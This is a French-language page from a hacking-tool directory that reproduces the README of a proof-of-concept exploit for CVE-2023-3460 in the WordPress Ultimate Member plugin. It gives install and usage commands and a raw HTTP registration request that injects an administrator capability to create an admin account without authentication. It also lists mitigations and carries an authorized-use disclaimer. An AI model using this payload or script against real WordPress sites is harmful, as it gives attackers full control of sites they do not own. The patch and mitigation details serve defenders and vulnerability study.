Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-3460 — Preuve de concept pour CVE-2023-3460, une vulnérabilité d'escalade de privilèges dans WordPress Ultimate Member. Crée un compte administrateur via une demande d'inscription modifiée. Pour tests autorisés uniquement. | Kitploit
Outils/GitHubGitHub/gurjotexpert/cve-2023-3460
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

Preuve de concept pour CVE-2023-3460, une vulnérabilité d'escalade de privilèges dans WordPress Ultimate Member. Crée un compte administrateur via une demande d'inscription modifiée. Pour tests autorisés uniquement.

Voir le dépôt
11il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2023-3460 - Exploitation d'escalade de privilèges dans Ultimate Member WordPress

Il s'agit d'un exploit proof-of-concept (PoC) pour CVE-2023-3460, une vulnérabilité critique dans le plugin WordPress Ultimate Member. Il permet à des utilisateurs non authentifiés d'élever leurs privilèges au niveau Administrateur en créant une demande d'inscription malveillante.

🔥 Impact : Compromission complète du site via la création d'un compte administrateur non autorisé.


📌 Détails de la vulnérabilité

  • Plugin concerné : Ultimate Member
  • Versions affectées : ≤ 2.6.6
  • Version corrigée : 2.6.7
  • Type d'exploit : Escalade de privilèges via abus d'inscription
  • Authentification requise : ❌ Non
  • CVE : CVE-2023-3460

⚙️ Prérequis

  • Python 3
  • requests library
  • urllib3 library
  • beautifulsoup4 library

Installer les prérequis :

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 Utilisation de l'exploit

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ Exemple :

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 Fonctionnalités du script d'exploit

  • Récupère le nonce CSRF (_wpnonce) depuis la page d'inscription
  • Contourne la validation du formulaire
  • Injecte wp_capabilities avec le rôle administrator
  • Crée un nouvel utilisateur administrateur sans authentification

🔐 Exemple de charge utile de l'exploit

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Atténuation

  • Mettre à jour le plugin Ultimate Member vers v2.6.7 ou ultérieure
  • Désactiver l'inscription ouverte si non nécessaire
  • Surveiller les journaux de création d'utilisateurs pour toute activité suspecte

📚 Références

  • 🔗 Patchstack Advisory
  • 🔗 CVE-2023-3460 sur NVD

⚠️ Avertissement

Ce script est fourni à des fins éducatives et de tests autorisés uniquement. L'exploitation non autorisée de systèmes est illégale et contraire à l'éthique. Utilisez-le uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez l'autorisation de tester.


👨‍💻 Auteur

  • 💀 [GURJOT SINGH]
  • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
Télécharger l’outil